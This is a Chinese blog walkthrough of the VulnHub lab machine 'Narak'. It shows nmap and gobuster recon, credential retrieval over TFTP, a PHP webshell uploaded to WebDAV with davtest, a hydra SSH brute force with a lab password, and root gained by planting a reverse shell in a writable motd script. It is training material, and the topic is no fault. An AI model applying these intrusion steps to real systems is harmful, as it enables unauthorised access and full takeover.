NARAK

靶机搭建

下载链接
https://download.vulnhub.com/ha/narak.ova

信息搜集

主机发现

sudo nmap -sn 192.168.10.0/24

131是靶机

端口扫描

快速TCP扫描

sudo nmap -sT --min-rate 10000 -p- 192.168.10.131 -oA ports

开放了22,80两个端口

常见端口的UDP扫描

sudo nmap -sU --top-ports 50 192.168.10.131 -oA udp

tftp可能是开放的

详细TCP扫描

sudo nmap -sT -sV -sC -O -p22,80 192.168.10.131 -oA details

漏洞脚本扫描

sudo nmap --script=vuln -p22,80 192.168.10.131 -oA vuln

漏洞探测

web渗透

web页面有很多图片,没什么用用的信息

扫一下目录

gobuster dir -u http://192.168.10.131 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.tx
t -x zip,txt,php

images下全是图片

webdav需要登录,弱密码没成功

tips.txt中有提示,登录的凭据应该是在creds.txt中

但没这个路由

tftp渗透

TFTP = Trivial File Transfer Protocol,简单文件传输协议

极简轻量的文件上传 / 下载协议,无复杂认证、无目录管理;

udp扫描显示69的tftp可能开着,会不会creds.txt在tftp中呢?尝试连接一下

还真有这个文件

解密拿到一组凭据

不能登录ssh

回到web尝试登录webdav

登录成功,但目录下什么都没有

获取立足点

WebDAV = Web Distributed Authoring and Versioning 基于 Web 的分布式读写 / 版本控制协议

WebDAV 给 HTTP 增加完整文件读写、目录管理能力,让网页服务器变成远程网盘服务器

找一个连接工具,可以用davtest

davtest -url http://192.168.10.131/webdav -auth  yamdoot:Swarg

可以上传php,txt,html文件

尝试传一个一句话木马

davtest -url http://192.168.10.131/webdav -auth  yamdoot:Swarg -uploadfile evil.php -uploadloc evil.php 

成功了,反弹shell

用一句话木马没弹成功,重新上传了一个shell.php

提权

寻找可写文件

find / -writable -type f -not -path '/proc/*' -not -path '/sys/*'  2> /dev/null

对hell.sh挺感兴趣的,里面有brainfuck

解密一下,感觉是密码

从/etc/passwd中可以看到,能登录的用户只有四个

用hydra爆破

hydra -L users.txt -p chitragupt ssh://192.168.10.131

是inferno用户的密码

登录ssh

拿到userflag

继续找可写文件

root的文件,但可写,很可疑

motd(Message of the Day)文件用于在用户登录 Linux 系统时显示欢迎信息或通知。它通常用于向用户提供系统信息、公告、或其他登录时需要注意的事项。每次登录时会以root身份执行。

在第一个文件中加入反弹shell语句

重新登录,拿到rootshell

posted @ 2026-07-10 18:45  leee0  阅读(6)  评论(0)    收藏  举报